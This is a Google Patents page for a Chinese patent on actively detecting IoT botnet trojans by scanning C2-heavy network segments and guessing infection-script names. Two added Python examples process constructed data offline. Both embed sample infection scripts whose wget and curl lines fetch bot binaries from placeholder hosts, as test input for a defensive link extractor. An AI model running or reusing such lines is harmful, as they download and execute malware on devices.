CN110798439B - Method, equipment and storage medium for actively detecting internet-of-things botnet trojan - Google Patents

Info

Publication number
CN110798439B
Authority
CN
China
Prior art keywords
trojan
script
infection
information
internet
Legal status
Active
Application number
CN201811025294.8A
Other languages
Chinese (zh)
Other versions
CN110798439A
Inventor
严寒冰
黄云宇
丁丽
李佳
刘广柱
康学斌
郭晶
贾子骁
王小丰
肖新光
高胜
温森浩
李志辉
姚力
朱芸茜
王小群
张腾
吕利锋
陈阳
张世淙
徐剑
王适文
饶毓
肖崇蕙
张帅
吕志泉
韩志辉
马莉雅
雷君
周彧
周昊
高川
楼书逸
Current Assignee
National Computer Network and Information Security Management Center
Beijing Antiy Network Technology Co Ltd
Original Assignee
National Computer Network and Information Security Management Center
Beijing Antiy Network Technology Co Ltd
Application filed by National Computer Network and Information Security Management Center and Beijing Antiy Network Technology Co Ltd
Priority to CN201811025294.8A
Publication of CN110798439A
Application granted
Publication of CN110798439B

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1441 Countermeasures against malicious traffic
    • H04L63/145 Countermeasures against malicious traffic, the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
    • H04L2463/00 Additional details relating to network architectures or network communication protocols for network security covered by H04L63/00
    • H04L2463/144 Detection or countermeasures against botnets

Abstract

The invention provides a method, equipment and a storage medium for actively detecting internet-of-things botnet trojans. The method comprises: obtaining control node information from known internet-of-things botnet trojans; extracting the corresponding script file names as a script name dictionary set; actively carrying out full-port scanning detection on the high-frequency IP network segments to obtain port fingerprint information and screen out the important fingerprints; carrying out automatic blind guessing of infection scripts, according to the script name dictionary set, on the target ports with important fingerprint information; extracting the trojan download links stored in the automatic infection scripts obtained by blind guessing; and downloading the trojans according to those download links, detecting, identifying and classifying them, and providing information for subsequent trojan monitoring. The invention also provides corresponding equipment, a device and a storage medium. By this method, internet-of-things botnet trojans can be actively acquired, and effective information is provided for subsequent monitoring and threat intelligence acquisition.

Description

Method, equipment and storage medium for actively detecting internet-of-things botnet trojan
Technical Field
The invention relates to the field of network security, in particular to a method, equipment and a storage medium for actively detecting internet-of-things botnet trojans.
Background
Existing sources for capturing internet-of-things botnet trojans are basically on-site forensics during the attack stage, or honeypot capture during the infection stage of the trojan life cycle. Trojans acquired through on-site forensics suffer from serious lag and uncertainty. Although honeypots can capture internet-of-things trojans earlier, in the infection stage and before on-site forensics takes place, the result still falls short of optimal because honeypot capture is passive and its coverage is low: the honeypot may be unaware, or entirely unaware, that a security threat event has occurred, so timely early warning of the security threat situation is difficult to achieve. Therefore, relying solely on on-site forensics or honeypot capture cannot achieve effective coverage, a high-threat internet-of-things botnet cannot be monitored in time, and related network attack events cannot be traced.
Disclosure of Invention
Based on these problems, the invention provides a method, equipment and a storage medium for actively detecting internet-of-things botnet trojans, which acquire automatic trojan infection scripts in time by actively probing each port of the internet of things, advance sample capture to the early stage of the infection stage, and achieve a higher detection coverage rate.
Firstly, the invention provides a method for actively detecting internet of things botnet trojans, which comprises the following steps:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
In the method, before extracting the information of each trojan control node, the method further includes: and classifying the Internet of things botnet trojans according to family versions.
In the method, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the method, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides equipment for actively detecting the internet of things botnet trojans, which comprises: a memory and a processor;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
The device further comprises, before extracting the information of each Trojan control node: and classifying the Internet of things botnet trojans according to family versions.
In the device, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the equipment, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides a device for actively detecting the internet of things botnet trojans, which comprises:
the information extraction module is used for acquiring the known internet of things botnet trojans and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
the script name dictionary set creation module extracts all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performs duplication removal to serve as a script name dictionary set;
the information sorting module is used for classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
the fingerprint information acquisition module is used for actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of the port;
the fingerprint information classification module is used for classifying the acquired fingerprint information and screening out important fingerprint information according to the importance degree;
the blind guessing module is used for carrying out automatic blind guessing of the infection script on the target port with the important fingerprint information according to the script name dictionary set;
the link extraction module is used for extracting Trojan download links stored in the automatic infection script aiming at the automatic infection script obtained by blind guess;
and the downloading module is used for downloading the Trojan according to the Trojan downloading link, detecting and identifying the Trojan, classifying the Trojan and providing information for subsequent Trojan monitoring.
The invention also proposes a non-transitory computer-readable storage medium having stored thereon a computer program which, when executed by a processor, implements a method of actively detecting internet of things botnet trojans as described in any one of the above.
The method has the advantage that IP network segment scanning of the sites commonly used by internet-of-things botnets to host trojans can be carried out actively through active detection technology, the automatic trojan infection scripts are obtained in time by blind guessing, and sample capture is advanced to the early stage of the infection stage with a higher coverage rate. Meanwhile, the main scanning objects are the IP network segments in which historical internet-of-things C2 servers or trojan hosting sites are located, so scanning is accurately correlated to IP /16 segments and scanning efficiency is improved. The method and process for capturing internet-of-things botnet trojans are thereby optimized, and the efficiency and coverage of capturing internet-of-things trojans are effectively improved, providing effective information for subsequent monitoring of internet-of-things botnets and threat intelligence acquisition.
Drawings
In order to illustrate the technical solutions of the present invention or of the prior art more clearly, the drawings needed for the description of the embodiments or of the prior art are briefly introduced below. Obviously, the drawings described below show only some of the embodiments of the present invention, and those skilled in the art can obtain other drawings from them without creative effort.
FIG. 1 is a flowchart of an embodiment of a method for actively detecting a botnet Trojan horse of the Internet of things according to the present invention;
FIG. 2 is a schematic structural diagram of an apparatus for actively detecting a botnet Trojan horse of the Internet of things according to the present invention;
FIG. 3 is a schematic structural diagram of a device for actively detecting internet of things botnet trojans.
Detailed Description
In order to make the technical solutions in the embodiments of the present invention better understood and make the above objects, features and advantages of the present invention more comprehensible, the technical solutions of the present invention are described in further detail below with reference to the accompanying drawings.
First, the invention provides a method for actively detecting internet of things botnet trojans, as shown in fig. 1, comprising the following steps:
S101: acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
known internet of things botnet trojans are, for example, Mirai, Gafgyt and other internet of things botnet trojan families frequently used by attackers;
the control node information comprises the C2 (IP/domain + port) hard coded in the trojan, the automatic internet of things trojan infection script download link and the IP network segment;
S102: extracting all infection script file names from the automatic internet of things trojan infection script download links, and removing duplicates to obtain a script name dictionary set;
S103: classifying and sorting the extracted control node information of each trojan to obtain the high-frequency IP network segments; in this way, the IP network segments in which historical internet of things C2 servers are concentrated at high frequency can be consolidated;
S104: actively carrying out full-port scanning detection on the high-frequency IP network segments to acquire port fingerprint information;
S105: classifying the acquired fingerprint information, and screening out the important fingerprint information according to its importance;
this step strictly screens the fingerprint data of key service ports and eliminates junk fingerprint noise. For example, Apache fingerprint data on port 80 is retained, which provides accurate data for the later automatic infection script detection, while service fingerprint data that is not Apache is eliminated;
S106: carrying out automatic blind guessing of infection scripts, according to the script name dictionary set, on the target ports with important fingerprint information;
S107: extracting the trojan download links stored in the automatic infection scripts obtained by blind guessing;
the automatic infection scripts store the download URLs of the trojans, so automatic sorting and extraction of the trojan download links from the automatic infection scripts is required, and the links are handed to the automatic trojan download of the next stage;
S108: downloading the trojans according to the trojan download links, detecting, identifying and classifying them, and providing information for subsequent trojan monitoring.
In the method, before extracting the information of each trojan control node, the method further includes: and classifying the Internet of things botnet trojans according to family versions.
In the method, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the method, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
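The offline intelligence-processing steps of the pipeline above (S102 script-name dictionary, S103 high-frequency /16 segments, S105 fingerprint screening and S107 link extraction), as an added example that is not code from the patent or its assignees. All control-node records, fingerprint records and the infection-script text are constructed sample data on documentation address ranges, and no scanning or downloading is performed.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed control-node records, one per known sample (S101): family,
# the C2 hard-coded in the sample (ip:port) and its infection-script link.
# Addresses are from the documentation ranges; none of this is a real node.
CONTROL_NODES = [
    {"family": "Mirai",  "c2": "192.0.2.10:23",     "script_url": "http://192.0.2.15/bins.sh"},
    {"family": "Mirai",  "c2": "192.0.2.44:23",     "script_url": "http://192.0.2.44/bins.sh"},
    {"family": "Gafgyt", "c2": "198.51.100.7:6667", "script_url": "http://198.51.100.9/gaf.sh"},
    {"family": "Mirai",  "c2": "192.0.2.99:1337",   "script_url": "http://192.0.2.99/update.sh"},
    {"family": "Gafgyt", "c2": "203.0.113.5:8080",  "script_url": "http://203.0.113.5/bins.sh"},
]

# Constructed port-fingerprint records, shaped like what the full-port scan
# of step S104 returns (ip, port, first bytes of the service reply).
FINGERPRINTS = [
    {"ip": "192.0.2.15", "port": 80,   "banner": "HTTP/1.1 200 OK\r\nServer: Apache/2.4.6 (CentOS)\r\n"},
    {"ip": "192.0.2.15", "port": 22,   "banner": "SSH-2.0-dropbear_2019.78\r\n"},
    {"ip": "192.0.2.44", "port": 80,   "banner": "HTTP/1.1 200 OK\r\nServer: nginx/1.14.0\r\n"},
    {"ip": "192.0.2.99", "port": 8080, "banner": "HTTP/1.0 404 Not Found\r\nServer: Apache/2.2.15\r\n"},
    {"ip": "192.0.2.99", "port": 23,   "banner": "\xff\xfb\x01login: "},
]

# Constructed text of an infection script of the kind step S106 retrieves:
# it fetches per-architecture binaries from one hosting site.
SAMPLE_SCRIPT = """#!/bin/sh
cd /tmp || cd /var/run
wget http://192.0.2.15/bins/bot.arm7 -O arm7
busybox wget http://192.0.2.15/bins/bot.mips -O mips
curl -O http://192.0.2.15/bins/bot.x86
wget http://192.0.2.15/bins/bot.arm7 -O arm7
"""


def script_name_dictionary(nodes):
    """S102: take the file name of every infection-script link and de-duplicate."""
    names = set()
    for node in nodes:
        name = urlsplit(node["script_url"]).path.rsplit("/", 1)[-1]
        if name:
            names.add(name)
    return sorted(names)


def host_of(endpoint):
    """IPv4 address of an 'ip:port' C2 string or of a URL; None for a domain name."""
    if "://" in endpoint:
        host = urlsplit(endpoint).hostname or ""
    else:
        host = endpoint.rsplit(":", 1)[0]
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return None  # domain-based C2: resolution is out of scope for this example


def high_frequency_segments(nodes, min_count=2):
    """S103: count distinct control-node IPs per /16 and keep the busy segments.
    Both the C2 and the script hosting address count, since the description
    scans the segments of historical C2s and hosting sites alike."""
    addresses = set()
    for node in nodes:
        for endpoint in (node["c2"], node["script_url"]):
            ip = host_of(endpoint)
            if ip is not None:
                addresses.add(ip)
    per_segment = Counter(
        str(ipaddress.ip_network(f"{ip}/16", strict=False)) for ip in addresses
    )
    return [(seg, n) for seg, n in per_segment.most_common() if n >= min_count]


SERVER_RE = re.compile(r"^Server:\s*(\S+)", re.IGNORECASE | re.MULTILINE)


def screen_fingerprints(records, wanted_server="Apache", wanted_ports=(80,)):
    """S105: keep only records whose Server header names the service of interest
    on a port of interest; everything else is discarded as fingerprint noise."""
    kept = []
    for rec in records:
        match = SERVER_RE.search(rec["banner"])
        if match is None or rec["port"] not in wanted_ports:
            continue
        product = match.group(1).split("/", 1)[0]
        if product.lower() == wanted_server.lower():
            kept.append({**rec, "server": match.group(1)})
    return kept


# Stop at whitespace and shell metacharacters so "url -O name" or "url; ..."
# does not bleed into the match.
URL_RE = re.compile(r"\b(?:https?|ftp|tftp)://[^\s\"'<>;|&]+", re.IGNORECASE)


def extract_download_links(script_text):
    """S107: trojan download links in a script, de-duplicated, in order of first
    appearance, ready for the download stage of step S108."""
    links = []
    for url in URL_RE.findall(script_text):
        if url not in links:
            links.append(url)
    return links


if __name__ == "__main__":
    print("script-name dictionary:", script_name_dictionary(CONTROL_NODES))
    print("high-frequency /16 segments:", high_frequency_segments(CONTROL_NODES))
    print("screened fingerprints:", screen_fingerprints(FINGERPRINTS))
    print("download links:", extract_download_links(SAMPLE_SCRIPT))
```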
The invention also provides equipment for actively detecting the botnet trojans of the internet of things, which comprises the following components as shown in fig. 2: a memory 201 and a processor 202;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
The device further comprises, before extracting the information of each Trojan control node: and classifying the Internet of things botnet trojans according to family versions.
In the device, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the equipment, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides a device for actively detecting the internet of things botnet trojans, which comprises the following components as shown in fig. 3:
the information extraction module 301 is used for acquiring the known internet of things botnet trojans and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
a script name dictionary set creating module 302 for extracting all infection script file names in the automatic Internet of things Trojan horse infection script download link and removing duplication to serve as a script name dictionary set;
the information sorting module 303 is used for classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
the fingerprint information acquisition module 304 is used for actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of the port;
a fingerprint information classification module 305 for classifying the acquired fingerprint information and screening out important fingerprint information according to the importance degree;
the blind guessing module 306 is used for carrying out automatic blind guessing of the infection script on the target port with the important fingerprint information according to the script name dictionary set;
a link extraction module 307, which extracts the trojan download link stored in the automatic infection script aiming at the automatic infection script obtained by blind guess;
and the downloading module 308 downloads the trojan according to the trojan downloading link, detects and identifies the trojan, classifies the trojan, and provides information for subsequent trojan monitoring.
The invention also proposes a non-transitory computer-readable storage medium having stored thereon a computer program which, when executed by a processor, implements a method of actively detecting internet of things botnet trojans as described in any one of the above.
From the above description of the embodiments, it is clear to those skilled in the art that the present invention can be implemented by software plus the necessary general-purpose hardware platform. With this understanding, the technical solutions of the present invention, or the part thereof that contributes over the prior art, may be embodied in the form of a software product stored in a storage medium.
The embodiments in the present specification are described in a progressive manner, and the same and similar parts among the embodiments are referred to each other, and each embodiment focuses on the differences from the other embodiments. In particular, for the system embodiment, since it is substantially similar to the method embodiment, the description is simple, and for the relevant points, reference may be made to the partial description of the method embodiment.
While the present invention has been described with respect to the embodiments, those skilled in the art will appreciate that there are numerous variations and permutations of the present invention without departing from the spirit of the invention, and it is intended that the appended claims cover such variations and modifications as fall within the true spirit of the invention.

Claims (8)

1. A method for actively detecting Internet of things botnet trojans is characterized by comprising the following steps:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
according to the script name dictionary set, carrying out automatic infection script blind guessing on a target port with important fingerprint information, wherein the automatic infection script blind guessing specifically comprises the following steps: enumerating and detecting scripts possibly existing in a target port through an existing script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
2. The method of claim 1, further comprising, prior to said extracting each trojan control node information: and classifying the Internet of things botnet trojans according to family versions.
3. The method of claim 1, wherein the active full port scanning probing of the high frequency IP network segment to obtain the fingerprint information of the port specifically comprises: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
4. An apparatus for actively detecting Internet of things botnet trojans, characterized by comprising: a memory and a processor;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
according to the script name dictionary set, carrying out automatic infection script blind guessing on a target port with important fingerprint information, wherein the automatic infection script blind guessing specifically comprises the following steps: enumerating and detecting scripts possibly existing in a target port through an existing script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
5. The apparatus of claim 4, further comprising, prior to said extracting of each trojan control node's information: classifying the Internet of things botnet trojans according to family versions.
6. The apparatus of claim 4, wherein the active full-port scanning detection of the high-frequency IP network segment to acquire the fingerprint information of the port specifically comprises: establishing communication with each port of the high-frequency IP network segment respectively, collecting the returned information, and extracting fingerprint information.
7. A device for actively detecting internet-of-things botnet trojans, characterized by comprising:
the information extraction module is used for acquiring the known internet of things botnet trojans and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
the script name dictionary set creation module extracts all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performs duplication removal to serve as a script name dictionary set;
the information sorting module is used for classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
the fingerprint information acquisition module is used for actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of the port;
the fingerprint information classification module is used for classifying the acquired fingerprint information and screening out important fingerprint information according to the importance degree;
the blind guess module carries out automatic blind guess of the infection script on the target port with important fingerprint information according to the script name dictionary set, and the automatic blind guess of the infection script specifically comprises the following steps: enumerating and detecting scripts possibly existing in a target port through an existing script name dictionary set;
the link extraction module is used for extracting Trojan download links stored in the automatic infection script aiming at the automatic infection script obtained by blind guess;
and the downloading module is used for downloading the Trojan according to the Trojan downloading link, detecting and identifying the Trojan, classifying the Trojan and providing information for subsequent Trojan monitoring.
8. A non-transitory computer readable storage medium having stored thereon a computer program, which when executed by a processor, implements the method of actively detecting internet of things botnet trojans of any one of claims 1-3.
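The offline processing steps shared by claims 1, 4 and 7 (building the script-name dictionary set from infection-script download links, deriving the high-frequency IP network segment from the control-node information, and extracting the trojan download link stored in an infection script) are illustrated below. This is an added Python example written for this page, not code from the patent or its assignees. The record layout, the family names, the documentation-range addresses and the infection-script text are constructed assumptions; the full-port scanning and script-name enumeration steps need live network access and are out of scope here, so only the intelligence-processing side of the pipeline is shown.

```python
"""Offline processing of the control-node information the claims describe.

Added example (not the patent's own code): given control-node records
(C2 address and infection-script download link per known sample), it
  1. builds the deduplicated script-name dictionary set,
  2. ranks /24 network segments by how often C2 and download hosts fall in
     them (the "high-frequency IP network segment"), and
  3. extracts trojan download links from the text of an infection script.
All IPs, family names and the script text are constructed sample data.
"""
from collections import Counter
import ipaddress
import re
from urllib.parse import urlparse

# Constructed sample records: (family, C2 host:port, infection-script download link).
# Addresses are taken from the documentation ranges 198.51.100.0/24,
# 203.0.113.0/24 and 192.0.2.0/24; the family names are placeholders.
SAMPLE_CONTROL_NODES = [
    ("family-a", "198.51.100.10:23", "http://198.51.100.12/bins/x86.sh"),
    ("family-a", "198.51.100.10:23", "http://198.51.100.12/bins/mips.sh"),
    ("family-b", "203.0.113.7:6667", "http://203.0.113.9/bins.sh"),
    ("family-a", "198.51.100.11:23", "http://198.51.100.12/bins/x86.sh"),
    ("family-c", "c2.example.invalid:1337", "http://192.0.2.5/update.sh"),
]

# Constructed infection-script text in the shape such scripts commonly take:
# one download command per target architecture, then cleanup.
SAMPLE_INFECTION_SCRIPT = """#!/bin/sh
cd /tmp || cd /var/run
wget http://198.51.100.12/bins/x86 -O x86
wget http://198.51.100.12/bins/mips -O mips
curl -O http://203.0.113.9/bins/arm7
wget http://198.51.100.12/bins/x86 -O x86
rm -rf x86 mips arm7
"""

_URL_RE = re.compile(r"https?://[^\s'\"<>;|&]+")


def build_script_name_dictionary(links):
    """Deduplicated, sorted script file names taken from download-link paths."""
    names = set()
    for link in links:
        name = urlparse(link).path.rsplit("/", 1)[-1]
        if name:  # a link ending in "/" carries no file name
            names.add(name)
    return sorted(names)


def _host_ip(host_or_url):
    """Return the IP address of a URL or host:port string, or None for a domain name."""
    value = host_or_url if "//" in host_or_url else "//" + host_or_url
    host = urlparse(value).hostname
    try:
        return ipaddress.ip_address(host)
    except (TypeError, ValueError):
        return None  # domain names would need resolution; skipped in this offline step


def high_frequency_segments(records, prefix_len=24, min_count=2, family=None):
    """Count how often C2 and download-link hosts fall in each /prefix_len segment.

    Every record contributes once per IP host it names, so a C2 reused by many
    samples weighs more than one seen once. Returns (segment, count) pairs sorted
    by descending count, keeping only segments seen at least min_count times.
    An optional family filter mirrors the per-family classification of claim 2.
    """
    counter = Counter()
    for fam, c2, link in records:
        if family is not None and fam != family:
            continue
        for candidate in (c2, link):
            ip = _host_ip(candidate)
            if ip is None:
                continue
            net = ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)
            counter[str(net)] += 1
    ranked = [(net, n) for net, n in counter.items() if n >= min_count]
    return sorted(ranked, key=lambda item: (-item[1], item[0]))


def extract_download_links(script_text):
    """Unique http(s) URLs found in an infection script, in order of first appearance."""
    links = []
    for match in _URL_RE.finditer(script_text):
        url = match.group(0).rstrip(".,)")
        if url not in links:
            links.append(url)
    return links


if __name__ == "__main__":
    print("script names:", build_script_name_dictionary(r[2] for r in SAMPLE_CONTROL_NODES))
    print("segments:", high_frequency_segments(SAMPLE_CONTROL_NODES))
    print("links:", extract_download_links(SAMPLE_INFECTION_SCRIPT))
```

The segment ranking counts both the hard-coded C2 and the download host of every record, so a segment that hosts several stages of one family's infrastructure rises to the top; the returned links would feed the download, detection and classification step of the claims, with the script-name list serving as the dictionary set the claims describe.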
CN201811025294.8A 2018-09-04 2018-09-04 Method, equipment and storage medium for actively detecting internet-of-things botnet trojan Active CN110798439B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201811025294.8A CN110798439B (en) 2018-09-04 2018-09-04 Method, equipment and storage medium for actively detecting internet-of-things botnet trojan

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201811025294.8A CN110798439B (en) 2018-09-04 2018-09-04 Method, equipment and storage medium for actively detecting internet-of-things botnet trojan

Publications (2)

Publication Number Publication Date
CN110798439A CN110798439A (en) 2020-02-14
CN110798439B true CN110798439B (en) 2022-04-19

Family

ID=69425767

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201811025294.8A Active CN110798439B (en) 2018-09-04 2018-09-04 Method, equipment and storage medium for actively detecting internet-of-things botnet trojan

Country Status (1)

Country Link
CN (1) CN110798439B (en)

Citations (9)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101651579A (en) * 2009-09-15 2010-02-17 成都市华为赛门铁克科技有限公司 Method and gateway device for identifying Botnet
CN101673326A (en) * 2008-09-11 2010-03-17 北京理工大学 Method for detecting web page Trojan horse based on program execution characteristics
CN102546298A (en) * 2012-01-06 2012-07-04 北京大学 Botnet family detection method based on active probing
CN102955913A (en) * 2011-08-25 2013-03-06 腾讯科技(深圳)有限公司 Method and system for detecting hung Trojans of web page
CN103973664A (en) * 2013-01-28 2014-08-06 信息安全有限公司 Webshell detection and response system
CN106603521A (en) * 2016-12-09 2017-04-26 北京安天电子设备有限公司 Network control node detection method and system
CN106982188A (en) * 2016-01-15 2017-07-25 阿里巴巴集团控股有限公司 The detection method and device in malicious dissemination source
CN107463844A (en) * 2016-06-06 2017-12-12 国家计算机网络与信息安全管理中心 WEB Trojan detecting methods and system
CN108156174A (en) * 2018-01-15 2018-06-12 深圳市联软科技股份有限公司 Botnet detection method, device, equipment and medium based on the analysis of C&C domain names

Family Cites Families (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US9142102B2 (en) * 2013-07-02 2015-09-22 Icf International Method and apparatus for visualizing network security alerts

Also Published As

Publication number Publication date
CN110798439A (en) 2020-02-14

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant